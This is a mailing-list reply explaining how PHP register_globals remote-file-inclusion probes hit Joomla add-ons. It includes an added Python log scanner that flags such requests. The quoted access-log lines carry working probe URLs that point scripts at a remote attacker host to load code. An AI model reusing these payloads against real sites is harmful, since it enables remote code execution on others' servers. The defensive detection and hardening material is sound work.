Re: PLUG site incident last night

Author: JD Austin
Date:  
To: Main PLUG discussion list
Subject: Re: PLUG site incident last night
Using URL tricks, crackers exploit many types of web applications.
The register_globals feature in PHP is used to trick the site into using
a different configuration .php file in another location across the net
and run it. It's a trick as old as CGI.
Looking at my logs I see TONS of these types of attempts:

    208.31.216.8 - - [01/Jan/2007:08:59:52 -0500] "GET /becommunity/community/index.php?pageurl=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:08:59:53 -0500] "GET /shoutbox/expanded.php?conf=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:08:59:56 -0500] "GET /dotproject/modules/tasks/addedit.php?root_dir=http://morfeus.us/M.php?&/ HTTP/1.1" 200 176 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:09:00:00 -0500] "GET /My_eGallery/public/displayCategory.php?basepath=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:09:02:09 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://morfeus.us/M.php?&/ HTTP/1.1" 403 1240 "-" "Morfeus FXXXing Scanner"

It was never an issue with Joomla itself, but third-party components and
modules coded by people less security minded have been exploited.
com_extcalendar, com_galeria and a few others were commonly used to
overwrite the index.php and configuration.php files. From there they'd
use PHP to create and run shell scripts to do various malicious things.

Components should have this in them somewhere:
defined( '_VALID_MOS' ) or die( 'Restricted access' );

Since Joomla 1.0.11 this issue has been addressed using .htaccess and
re-coding to allow register globals to be turned off. Since Joomla is
used on a wide range of platforms (even windows) they still support the
old register_globals method of variables but try to coerce users into
setting it up right.

I also install mod_security to make that sort of attack stop in its tracks.

JD
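Added illustration, not part of JD's message or of the PLUG site's or Joomla's own code: a small Python script that parses Apache combined-format access log lines and flags any query parameter whose value is a remote URL, which is exactly the register_globals-style remote file inclusion probe shown in the excerpt above. The sample log is constructed for the example: the first two lines are copied from the excerpt (rejoined onto one line each), the third is a made-up benign Joomla request for contrast. The `served_2xx` flag is this example's own heuristic, not a Joomla or Apache field.

```python
"""Flag remote-file-inclusion probes in Apache combined-format access logs."""
import re
from urllib.parse import parse_qsl, urlsplit

# One Apache "combined" log entry:
# host ident user [time] "method target protocol" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A parameter whose value begins with one of these is asking the script to
# load code from another host instead of the local filesystem.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "ftps://")

# Constructed sample: two lines from the excerpt above, plus one benign request.
SAMPLE_LOG = """\
208.31.216.8 - - [01/Jan/2007:08:59:52 -0500] "GET /becommunity/community/index.php?pageurl=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:08:59:56 -0500] "GET /dotproject/modules/tasks/addedit.php?root_dir=http://morfeus.us/M.php?&/ HTTP/1.1" 200 176 "-" "Morfeus FXXXking Scanner"
10.0.0.5 - - [01/Jan/2007:09:05:00 -0500] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    fields["status"] = int(fields["status"])
    return fields


def rfi_parameters(target):
    """Yield (name, value, script_path) for each query parameter whose value is a remote URL."""
    parts = urlsplit(target)
    # parse_qsl percent-decodes, so an encoded "http%3A%2F%2F" is caught as well.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if value.strip().lower().startswith(REMOTE_PREFIXES):
            yield name, value, parts.path


def find_rfi_attempts(log_text):
    """Scan a block of log lines and return one record per suspicious parameter."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for name, value, script in rfi_parameters(entry["target"]):
            hits.append({
                "host": entry["host"],
                "time": entry["time"],
                "script": script,
                "param": name,
                "remote_url": value,
                "status": entry["status"],
                "agent": entry["agent"],
                # A 2xx does not prove the include ran (the script may only have
                # printed an error), but it is the line to examine first; a 404
                # means the targeted component is not even installed.
                "served_2xx": 200 <= entry["status"] < 300,
            })
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        flag = "REVIEW" if hit["served_2xx"] else "probe"
        print(f'{flag:6} {hit["host"]} {hit["script"]} '
              f'{hit["param"]}={hit["remote_url"]} -> {hit["status"]}')
```

Run it against a real access_log (`find_rfi_attempts(open("access_log").read())`) and sort the hits by `served_2xx` first: the 404s are noise from scanners hitting components that were never installed, while a 200 against a script that does exist is where to start checking whether the include actually fetched the remote file.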

Technomage wrote:
> this may sound like a stupid question on my part (sorry guys, I've been
> working lately, so I haven't kept up): what exactly was cracked on the site
> and how was it done?
>
> details would be greatly appreciated.
>
> thanks.
>
>
> On Monday 01 January 2007 04:29, Jim wrote:
>
>> Edward Norton wrote:
>>
>>> PLUG cracked AGAIN? Not surprising considering you guys won't consider
>>> anything other than a badly coded PHP CMS.
>>>
>> Ed,
>>
>> Apparently you know more about securing a site than the people who run
>> it. At least that's what your message implies. I have an idea. When
>> it's time for the next PLUG meeting, come out of the sewer, show up at
>> the meeting and offer to help secure the site.
>>

---------------------------------------------------
PLUG-discuss mailing list -
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss